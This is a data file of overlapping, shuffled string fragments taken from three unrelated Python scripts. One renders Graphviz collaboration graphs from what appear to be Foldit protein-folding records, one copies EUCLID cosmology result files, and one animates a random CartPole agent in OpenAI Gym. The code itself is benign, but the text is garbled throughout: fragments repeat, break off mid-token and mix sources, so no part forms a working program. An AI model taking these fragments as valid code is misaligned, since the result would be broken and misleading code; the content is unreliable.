"p[0])} for gid, uids in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {})", "= list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on", "| neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid:", "from util import PDB_Info, get_data_value from typing import NamedTuple, Tuple, List, Dict import", "people who just loaded in a shared solution but didn't do anything #", "# dot.subgraph(sg) # nodes and edges for shared solutions for uid, pdbs in", "in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy", "def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> 
List[Collaborator]: children = [] for", "for sg in evolver_clusters.values(): # dot.subgraph(sg) # do it again, this time for", "-> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source =", "in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid:", "uid, g in # uid_grouped if uid not in active_uids} # screen out", "in enumerate(lines): sids = [p.sid for p in line.pdb_infos] if s.sid in sids:", "p: p.timestamp), axis=1) shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda", "render_collab(data): user_colors = {} for pid in data.pid.unique(): print(pid) df = data[data.pid ==", "cm = plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') # for gid, c", "uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver", "'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids}", "nodes and edges for shared solutions for uid, pdbs in shared.items(): gid =", "PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info,", "get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in uid_grouped} # further group by", "ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb in pdbs: if get_tag(pdb)", "children def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for pid in data.pid.unique(): logging.debug(\"getting", "# evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for", "# lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped if uid", "in 
targets} roots = sum(([p for p in pdbs if p.scoretype == '1'", "e: e.uid), lambda e: e.uid) # group by evolver uid_source_grouped = { uid:", "if uid not in active_uids} # screen out anyone who later actively evolved", "source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) ->", "c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c dot = Digraph(name=\"parent\",", "for pdb in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb),", "for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for", "to colors cdict = {} # gids = set([xs[0].gid for xs in shared.values()]", "round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'],", "for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag,", "str: if s.scoretype == \"1\": return s.uid for i, line in enumerate(lines): sids", "if args.debug: for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30) as pool: pool.map(render_collab,", "in evolves))) # evoling_start = min(e.timestamp for e in evolves) # edge_color =", "in any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator,", "- start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid,", "lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d", "== '2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid, 
uids in", "= Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters", "'actions'])]), []))), lambda p: p[0])} for gid, uids in groups_uids.items(): cdict[gid] = {}", "-> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines:", "collabs[pid] = [] for root in roots: tag = get_tag(root) sids = get_relevant_sids(root,", "evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for", "groups_uids} evolved = {} # create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves,", "get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start) /", "r.lines for p in l.pdb_infos] if r.lines else []) + ([p for l", "= df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for p", "evolver uid_source_grouped = { uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda", "([p for l in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else []),", "== '0' or p['header']['score'] == 9999.99 for p in pdl) def remove_corrupted(pdb_infos): return", "e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped} # further group by source", "sum(([p for p in pdbs if p.scoretype == '1' and get_tag(p) in evolved_targets]", "for uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored = len([p for p", "fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed')", "# c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), 
shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)]", "graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved = {} # create evolver nodes", "c.weight for c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab)", "and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d", "source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4))", "# graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids} for uid, evolved_targets in uid_source_grouped.items():", "just loaded in a shared solution but didn't do anything # uid_grouped =", "np import matplotlib.pyplot as plt from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor", "len(front) > 0: # ntab, cur = front.pop() # print(\" \"*ntab, cur.tag) #", "'1' and get_tag(p) in evolved_targets] for pdbs in shared.values()), []) evolves_by_source = {tag:", "who later actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape':", "for l in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else []), key=lambda", "prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color", "[]), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x", "# evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) #", "{uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb,", "x in d if x.scoretype == '2' and x.pdl[-1]['actions']]), 
[])) uid_grouped = groupby(sorted(active_evolves,", "0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid']", "if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves =", "in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in", "for pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid, pdbs in", "evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', #", "import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score']", "colorsys import subprocess import argparse import os import csv import json import logging", "in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for", "evoling_start = min(e.timestamp for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 +", "uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped = {", "key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] =", "\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs", "out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot | gvpack -array_c{} | neato -Tpng", "in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target,", "# ntab, cur = front.pop() # print(\" 
\"*ntab, cur.tag) # front.extend([(ntab + 1,", "[(1, c) for c in collab.children] # while len(front) > 0: # ntab,", "get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x:", "list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d", "sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for shared solutions for", "\"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style':", "= { uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'],", "shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start = min(e.timestamp for e in", "'filled'}) as c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape", "g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in", "found in any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab:", "uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda", "and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x", "color in group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert", "l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid," ]
[ "prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_' prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename,", "idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename) print(path) #", "import shutil prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_' prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename=", "os import shutil prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_' prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path)", "in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename) print(path) # os.rename(prepath_in+str(idx)+'.err',", "range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename) print(path) # os.rename(prepath_in+str(idx)+'.err', prepath_out+str(idx)+'/EUCLID_GridPlot_56234229_'+str(idx)+'.err')", 
"prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename)", "import os import shutil prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_' prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/'", "shutil prepath_in='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/EUCLID/EUCLID_GridPlot_' prepath_out='/n/home02/ndeporzio/projects/cosmicfish/cfworkspace/results/FINAL_RESULTS/Parsed/EUCLID/EUCLID_GridPlot_' for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db')", "for idx in range(120): tidx=idx//10 midx=idx%10 path=prepath_out+str(idx)+'/' os.mkdir(path) filename= ('gp_'+str(tidx)+'_'+str(midx)+'.db') shutil.copyfile(prepath_in+str(idx)+'/'+filename, prepath_out+str(idx)+'/'+filename) print(path)" ]
[ "# /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib import animation # from", "patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50)", "frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0])", "参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib import animation", "gym import numpy as np import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL", "list of frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch", "import animation # from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays a list", "frames = [] env = gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array'))", "# framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info = env.step(action)", "def display_frames_as_gif(frames): \"\"\" Displays a list of frames as a gif, with controls", "with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i])", "animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames", "import display def display_frames_as_gif(frames): \"\"\" Displays a list of frames as a gif,", "np import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL 
http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb #", "# from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays a list of frames", "JSAnimation.IPython_display import display_animation from matplotlib import animation # from IPython.display import display def", "= animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす", "[] env = gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく", "matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display", "def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です #", "display_animation from matplotlib import animation # from IPython.display import display def display_frames_as_gif(frames): \"\"\"", "from JSAnimation.IPython_display import display_animation from matplotlib import animation # from IPython.display import display", "controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim", "step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation,", "追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset()", "gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action 
= np.random.choice(2)", "matplotlib import animation # from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays a", "= plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4')", "<reponame>kitfactory/python_test<filename>reinforce.py import gym import numpy as np import matplotlib.pyplot as plt # 動画の描画関数の宣言", "200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info", "framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info = env.step(action) #", "= gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action =", "interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env", "# 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from", "as np import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb", "\"\"\" Displays a list of frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0,", "animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames =", "in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward,", "env.reset() for step in range(0, 200): 
frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) #", "# 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0')", "as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import", "frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info =", "= np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info = env.step(action) # actionを実行する display_frames_as_gif(frames)", "animation # from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays a list of", "frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate,", "import display_animation from matplotlib import animation # from IPython.display import display def display_frames_as_gif(frames):", "http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib import animation #", "# from JSAnimation.IPython_display import display_animation from matplotlib import animation # from IPython.display import", "frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = []", "display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset() for step", "a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def", "dpi=72) patch 
= plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames),", "import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from", "plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(),", "action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done, info = env.step(action) # actionを実行する", "= [] env = gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array')) #", "plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') #", "anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) #", "range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す observation, reward, done,", "numpy as np import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault #", "as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off')", "animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim,", "a list of frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72)", 
"plt.axis('off') def animate(i): patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です", "for step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action = np.random.choice(2) # 0(カートを左に押す),1(カートを右に押す)をランダムに返す", "# CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset() for step in range(0,", "patch.set_data(frames[i]) anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames), interval=50) anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop'))", "display def display_frames_as_gif(frames): \"\"\" Displays a list of frames as a gif, with", "CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset() for step in range(0, 200):", "env = gym.make('CartPole-v0') env.reset() for step in range(0, 200): frames.append(env.render(mode='rgb_array')) # framesに各時刻の画像を追加していく action", "\"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i): patch.set_data(frames[i]) anim =", "動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib", "# display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset() for", "gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch = plt.imshow(frames[0]) plt.axis('off') def animate(i):", "display_frames_as_gif(frames): \"\"\" Displays a list of frames as a gif, with controls \"\"\"", "import numpy as np import matplotlib.pyplot as plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault", "IPython.display import display def 
display_frames_as_gif(frames): \"\"\" Displays a list of frames as a", "Displays a list of frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0),", "default_mode='loop')) # CartPoleをランダムに動かす frames = [] env = gym.make('CartPole-v0') env.reset() for step in", "of frames as a gif, with controls \"\"\" plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0), dpi=72) patch =", "plt # 動画の描画関数の宣言 # 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation", "# 参考URL http://nbviewer.jupyter.org/github/patrickmineault # /xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib import", "anim.save('movie_cartpole.mp4') # 追記:動画の保存です # display(display_animation(anim, default_mode='loop')) # CartPoleをランダムに動かす frames = [] env =", "import gym import numpy as np import matplotlib.pyplot as plt # 動画の描画関数の宣言 #", "from matplotlib import animation # from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays", "from IPython.display import display def display_frames_as_gif(frames): \"\"\" Displays a list of frames as", "/xcorr-notebooks/blob/master/Render%20OpenAI%20gym%20as%20GIF.ipynb # from JSAnimation.IPython_display import display_animation from matplotlib import animation # from IPython.display" ]
